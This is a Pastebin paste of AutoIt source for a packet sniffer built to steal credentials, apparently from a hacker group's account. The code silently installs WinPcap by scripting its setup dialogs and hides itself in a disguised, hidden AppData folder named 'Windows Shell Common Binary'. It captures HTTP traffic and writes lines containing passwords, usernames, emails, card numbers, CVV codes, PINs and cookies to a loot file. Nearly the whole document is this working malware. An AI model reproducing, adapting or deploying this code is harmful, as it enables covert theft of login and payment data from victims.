API tools faq
paste
Advertisement
KekSec

Private Sniffer Source code by Freak

KekSec
Sep 7th, 2020 (edited)
2,503
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 14.77 KB | None | 0 0
raw download clone embed print report
  1. #NoTrayIcon
  2. #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
  3. #AutoIt3Wrapper_Outfile=sniffer.exe
  4. #AutoIt3Wrapper_Compression=4
  5. #AutoIt3Wrapper_UseUpx=y
  6. #AutoIt3Wrapper_Res_Language=1033
  7. #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
  8. #AutoIt3Wrapper_Run_Tidy=y
  9. #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
  10. #AutoIt3Wrapper_Tidy_Stop_OnError=n
  11. #AutoIt3Wrapper_Run_Au3Stripper=y
  12. #Au3Stripper_Parameters=/so /mi 5 /mo
  13. #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
  14. #include <Crypt.au3>
  15. ;==============================================;
  16. ; Thanatos AutoIt Crypter stub By Freak        ;
  17. ; Coded By Freak                               ;
  18. ; Thanks to M3 for GUI                         ;
  19. ; Keep Credits if you Using Source             ;
  20. ;==============================================;
  21. Opt("ExpandEnvStrings", 1)
  22.  
  23. Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
  24. Global $lootLoc = $installdir & "\dump.dat"
  25. Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
  26. Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
  27.  
  28. _Singleton($sMutex)
  29. If Not FileExists(@SystemDir & "\wpcap.dll") Then
  30.     InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
  31.     Run(@TempDir & "\WinPcap_4_1_3.exe")
  32.     WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
  33.     Send("!n")
  34.     WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
  35.     Send("!a")
  36.     WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
  37.     ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
  38.     WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
  39.     Send("!f")
  40. EndIf
  41. installPCAP()
  42. $winpcap = _PcapSetup()
  43. $pcap_devices = _PcapGetDeviceList()
  44. $iface = 0
  45. $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
  46. Dim $keywords[20]
  47. $keywords[0] = "GET /"
  48. $keywords[1] = "POST /"
  49. $keywords[2] = "Host: "
  50. $keywords[3] = "User-Agent: "
  51. $keywords[4] = "Content-"
  52. $keywords[5] = "password="
  53. $keywords[6] = "user_name="
  54. $keywords[7] = "user="
  55. $keywords[8] = "Username="
  56. $keywords[9] = "User="
  57. $keywords[10] = "login="
  58. $keywords[11] = "email="
  59. $keywords[12] = "username="
  60. $keywords[13] = "holder="
  61. $keywords[14] = "number="
  62. $keywords[15] = "cvv="
  63. $keywords[16] = "pin="
  64. $keywords[17] = "transaction"
  65. $keywords[18] = "bank"
  66. $keywords[19] = "Cookie: "
  67. $lootHandle = FileOpen($lootLoc, 1)
  68. $sPacketText = ""
  69. $oldPacketText = ""
  70. While True
  71.     $aPacket = _TCP_Recv($pcap)
  72.     If UBound($aPacket) > 20 Then
  73.         $sPacketText = BinaryToString("0x" & $aPacket[20])
  74.         If $sPacketText = $oldPacketText Then
  75.             Sleep(250)
  76.             ContinueLoop
  77.         EndIf
  78.         If StringLen($sPacketText) > 13 Then
  79.             For $key = 0 To UBound($keywords) - 1
  80.                 If StringInStr($sPacketText, $keywords[$key]) Then
  81.                     If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
  82.                     $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
  83.                     For $aPT = 1 To UBound($aPacketText) - 1
  84.                         If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
  85.                             FileWriteLine($lootHandle, $aPacketText[$aPT])
  86.                             FileFlush($lootHandle)
  87.                             $oldPacketText = $sPacketText
  88.                         EndIf
  89.                     Next
  90.                     $oldPacketText = $sPacketText
  91.                 Else
  92.                     ConsoleWrite($sPacketText & @CRLF)
  93.                 EndIf
  94.             Next
  95.         EndIf
  96.     EndIf
  97.     $oldPacketText = $sPacketText
  98. WEnd
  99. Func _PcapGetDeviceList()
  100.     Local $alldevs = DllStructCreate("ptr")
  101.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
  102.     If (@error > 0) Then Return -1
  103.     If $r[0] = -1 Then Return -1
  104.     Local $next = DllStructGetData($alldevs, 1)
  105.     Local $list[1][14]
  106.     Local $i = 0
  107.     While ($next <> 0)
  108.         Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
  109.         Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
  110.         Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
  111.         $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
  112.         $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
  113.         Local $next_addr = DllStructGetData($pcap_if, "addresses")
  114.         Local $device = StringTrimLeft($list[$i][0], 8)
  115.         Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
  116.         DllStructSetData($snames, 1, $device)
  117.         Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
  118.         If IsPtr($handle[0]) Then
  119.             Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
  120.             DllStructSetData($packetoiddata, 1, 0x01010102)
  121.             DllStructSetData($packetoiddata, 2, 6)
  122.             Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
  123.             If $status[0] Then
  124.                 Local $mac = DllStructGetData($packetoiddata, 3)
  125.                 $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
  126.             EndIf
  127.             Local $nettype = DllStructCreate("uint type;uint64 speed")
  128.             $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
  129.             If $status[0] Then
  130.                 $list[$i][5] = DllStructGetData($nettype, 2)
  131.             EndIf
  132.             DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
  133.         EndIf
  134.         Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
  135.         If IsPtr($pcap) Then
  136.             Local $types = _PcapGetLinkType($pcap)
  137.             If IsArray($types) Then
  138.                 $list[$i][2] = $types[0]
  139.                 $list[$i][3] = $types[1]
  140.                 $list[$i][4] = $types[2]
  141.             EndIf
  142.             _PcapStopCapture($pcap)
  143.         EndIf
  144.         While $next_addr <> 0
  145.             Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
  146.             Local $j, $addr
  147.             For $j = 2 To 4
  148.                 $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
  149.                 If StringLen($addr) > 15 Then
  150.                     $list[$i][$j + 8] = $addr
  151.                 ElseIf StringLen($addr) > 6 Then
  152.                     $list[$i][$j + 5] = $addr
  153.                 EndIf
  154.             Next
  155.             $next_addr = DllStructGetData($pcap_addr, 1)
  156.         WEnd
  157.         $list[$i][13] = DllStructGetData($pcap_if, 5)
  158.         $next = DllStructGetData($pcap_if, 1)
  159.         $i += 1
  160.         If $next <> 0 Then ReDim $list[$i + 1][14]
  161.     WEnd
  162.     DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
  163.     Return $list
  164. EndFunc   ;==>_PcapGetDeviceList
  165. Func _PcapGetLinkType($pcap)
  166.     If Not IsPtr($pcap) Then Return -1
  167.     Local $type[3]
  168.     Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
  169.     $type[0] = $t[0]
  170.     Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
  171.     $type[1] = $name[0]
  172.     Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
  173.     $type[2] = $desc[0]
  174.     Return $type
  175. EndFunc   ;==>_PcapGetLinkType
  176. Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successfull array[0]=time [1]=captured len [2]=packet len [3]=packet data
  177.     If Not IsPtr($pcap) Then Return -1
  178.     $Pcap_ptrhdr = DllStructCreate("ptr")
  179.     $Pcap_ptrpkt = DllStructCreate("ptr")
  180.     Local $pk[4]
  181.     Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
  182.     If ($res[0] <> 1) Then Return $res[0]
  183.     Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
  184.     Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
  185.     Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
  186.     $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
  187.     $pk[1] = DllStructGetData($pkthdr, 3)
  188.     $pk[2] = DllStructGetData($pkthdr, 4)
  189.     $pk[3] = DllStructGetData($packet, 1)
  190.     $Pcap_statV += $pk[2]
  191.     $Pcap_statN += 1
  192.     Return $pk
  193. EndFunc   ;==>_PcapGetPacket
  194. Func _PcapSendPacket($pcap, $data) ; data in Binary Format
  195.     If Not IsPtr($pcap) Then Return -1
  196.     Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
  197.     DllStructSetData($databuffer, 1, $data)
  198.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
  199.     Return $r[0]
  200. EndFunc   ;==>_PcapSendPacket
  201. Func _PcapSetup()    ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll
  202.     If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
  203.     Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
  204.     Global $Pcap_errbuf = DllStructCreate("char[256]")
  205.     Global $Pcap_ptrhdr = 0
  206.     Global $Pcap_ptrpkt = 0
  207.     Global $Pcap_statV        ; Total volume captured
  208.     Global $Pcap_statN        ; Total number of packets captured
  209.     Global $Pcap_starttime    ; Start time of Capture
  210.     Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
  211.     Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
  212.     If (@error > 0) Then Return -1
  213.     Return $v[0]
  214. EndFunc   ;==>_PcapSetup
  215. Func _PcapSock2addr($sockaddr_ptr)
  216.     If ($sockaddr_ptr = 0) Then Return ""
  217.     Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
  218.     Local $family = DllStructGetData($sockaddr, 1)
  219.     If ($family = 2) Then
  220.         Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
  221.         Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
  222.     EndIf
  223.     If ($family = 23) Then
  224.         Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
  225.         Local $bin = DllStructGetData($sockaddr_in6, 4)
  226.         Local $i, $ipv6
  227.         For $i = 0 To 7
  228.             $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
  229.         Next
  230.         Return StringTrimRight($ipv6, 1)
  231.     EndIf
  232.     Return ""
  233. EndFunc   ;==>_PcapSock2addr
  234. Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
  235.     Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
  236.     If (@error > 0) Then Return -1
  237.     If ($handle[0] = 0) Then Return -1
  238.     DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
  239.     If ($filter <> "") Then
  240.         Local $fcode = DllStructCreate("UINT;ptr")
  241.         Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
  242.         If ($comp[0] = -1) Then
  243.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  244.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  245.             _PcapStopCapture($handle[0])
  246.             Return -1
  247.         EndIf
  248.         Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
  249.         If ($set[0] = -1) Then
  250.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  251.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  252.             _PcapStopCapture($handle[0])
  253.             Return -1
  254.             DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
  255.         EndIf
  256.     EndIf
  257.     If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
  258.     If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
  259.     $Pcap_statV = 0
  260.     $Pcap_statN = 0
  261.     $Pcap_starttime = TimerInit()
  262.     Return $handle[0]
  263. EndFunc   ;==>_PcapStartCapture
  264. Func _PcapStopCapture($pcap)
  265.     If Not IsPtr($pcap) Then Return
  266.     DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
  267. EndFunc   ;==>_PcapStopCapture
  268. Func _Singleton($occurenceName, $flag = 0)
  269.     Local $ERROR_ALREADY_EXISTS = 183
  270.     $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error
  271.     Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
  272.     ;    Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
  273.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
  274.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then
  275.         If $flag = 0 Then
  276.             Exit -1
  277.         Else
  278.             SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS
  279.             Return 0
  280.         EndIf
  281.     EndIf
  282.     Return $handle[0]
  283. EndFunc   ;==>_Singleton
  284.  
  285. Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
  286.     Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
  287.     $iTimer_Capture = TimerInit()
  288.     While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
  289.         $aPacket = _PcapGetPacket($hCapture)
  290.         If IsArray($aPacket) Then
  291.             If $iPacket = $iInstance Then
  292.                 Local $aTCPPacket[21]
  293.                 $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address
  294.                 $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address
  295.                 $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type
  296.                 $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length
  297.                 $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differientiated Services Field
  298.                 $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length
  299.                 $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification
  300.                 $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset
  301.                 $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live
  302.                 $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol
  303.                 $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum
  304.                 $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address
  305.                 $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address
  306.                 $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port
  307.                 $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port
  308.                 $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number
  309.                 $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number
  310.                 $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags
  311.                 $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value
  312.                 $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum
  313.                 $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data
  314.                 Return $aTCPPacket
  315.             EndIf
  316.             $iPacket += 1
  317.         EndIf
  318.     WEnd
  319.     Return -1
  320. EndFunc   ;==>_TCP_Recv
  321.  
  322. Func installPCAP()
  323.     DirCreate($installdir)
  324.     FileSetAttrib($installdir, "+SH")
  325. EndFunc   ;==>installPCAP
  326.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!